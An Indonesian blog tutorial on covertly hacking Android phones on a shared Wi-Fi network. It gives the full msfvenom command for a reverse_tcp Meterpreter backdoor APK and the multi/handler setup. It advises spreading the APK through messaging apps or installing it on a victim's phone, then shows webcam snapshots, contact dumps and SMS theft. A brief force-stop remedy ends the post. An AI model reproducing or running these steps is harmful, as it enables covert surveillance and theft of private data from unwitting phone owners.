Minggu, 16 Juni 2019

Terbaru 2020 - Cara Hack Android Metode Reverse TCP Backdor

Technology News



hai Kali Linux User :* kali ini gw mau bikin tutor heking aja suntuk pala gw malam minggu stok bokep gw dihapus paksa :'( udah lah tanpa banyak bacot lagi langsung pada inti nya kali ini gw mau share tutorial Sadap Atau Hacking Android Menggunakan metasploit yang pasti masih dalam 1 jaringan LAN / Wifi dengan metode reverse tcp backdoor.

oke pertama cek IP

root@yukinoshita47:~# ifconfig

kemudian tekan enter maka akan muncul ip nya seperti gambar dibawah ini ip gw 192.168.43.28

  
lanjut kita buat dulu backdoor nya dengan perintah 

msfvenom -p android/meterpreter/reverse_tcp LHOST=(ip) LPORT=(port) R > namafile.apk

contoh :

root@yukinoshita47:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.28 LPORT=4444 R > andro.apk

kemudian tekan enter jika muncul seperti gambar dibawah ini berarti berhasil

selanjut nya beri hak akses backdoor nya tadi disini nama backdoor nya andro.apk

root@yukinoshita47:~# chmod 777 andro.apk

kemudian tekan enter 

kemudian buka metasploit console dengan menggunakan perintah

root@yukinoshita47:~# msfconsole

 kemudian tekan enter akan muncul seperti gambar dibawah ini

 selanjut nya aktifkan exploit multi handler dengan masukkan perintah

msf > use multi/handler

kemudian tekan enter

kemudian aktifkan payload nya dengan memasukkan perintah

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

kemudian tekan enter 

selanjut nya set IP dengan menggunakan perintah

msf exploit(handler) > set LHOST 192.168.43.28

kemudian tekan enter 

lalu set port nya dengan memasukkan perintah

msf exploit(handler) > set LPORT 4444



kemudian tekan enter


selanjut nya jalan kan exploit nya dengan memasukkan perintah 

msf exploit(handler) > exploit 

kemudian tekan enter 

selanjut nya adalah penebaran backdoor nya bagaimana cara nya

ya cara nya adalah :

  1. Sebar via internet
  2. Kirim ke Target yang dituju via Facebook, WA, BBM, LINE, dan lainnya dan pastikan Target Menginstall nya
  3. Langsung install ke  smartphone target (you are the real social engineer bro :*)
 kali ini gw ngambil pilihan tiga yaitu install langsung ke smartphone target







kemudian buka backdoor apk nya tadi maka meterpreter session pun aktif disini kita udah dapat akses ke smartphone target langsung 

ini daftar perintah nya masukkan perintah

meterpreter > help

 kemudian tekan enter akan muncul seperti ini

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Android Commands
================

    Command        Description
    -------        -----------
    check_root     Check if device is rooted
    dump_calllog   Get call log
    dump_contacts  Get contacts list
    dump_sms       Get sms messages
    geolocate      Get current lat-long using geolocation




selanjut nya kita coba ambil foto dari kamera smartphone nya dengan memasukkan perintah

meterpreter > webcam_snap

kemudian tekan enter maka akan muncul seperti gambar dibawah ini


walah kok gelap -_- ulangi aja ya 

ulangi lagi meterpreter > webcam_snap kemudian tekan enter


oke berhasil foto nya buram -_- ngapain ya  


gw coba dump kontak smartphone nya dengan memasukkan perintah

meterpreter > dump_contacts

kemudian tekan enter 




aduh error -_- gak ada kontak nya kali ya oke kita coba dump sms aja dengan memasukkan perintah

meterpreter > dump_sms 

kemudian tekan enter


yeey berhasil :D 


kita coba buka ternyata isinya SMS Operator semua :v wkwkwkwkwkwkk 


Tanya : Saya kena backdoor metasploit ini min gimana solusi nya T_T
Jawab : ini jawaban nya

buka Settings > Aplikasi > Cari Apk Metasploit disini namanya MainActivity kemudian buka Apl nya terus pilih paksa berhenti  



maka akses nya terputus seperti gambar dibawah ini : 


baiklah cukup sampai disini tutorial nya lebih dan kurang mohon maaf silahkan explorasi sendiri jika tutorial ini dirasa masih kurang

sekian dan terimakasih

0 komentar:

Posting Komentar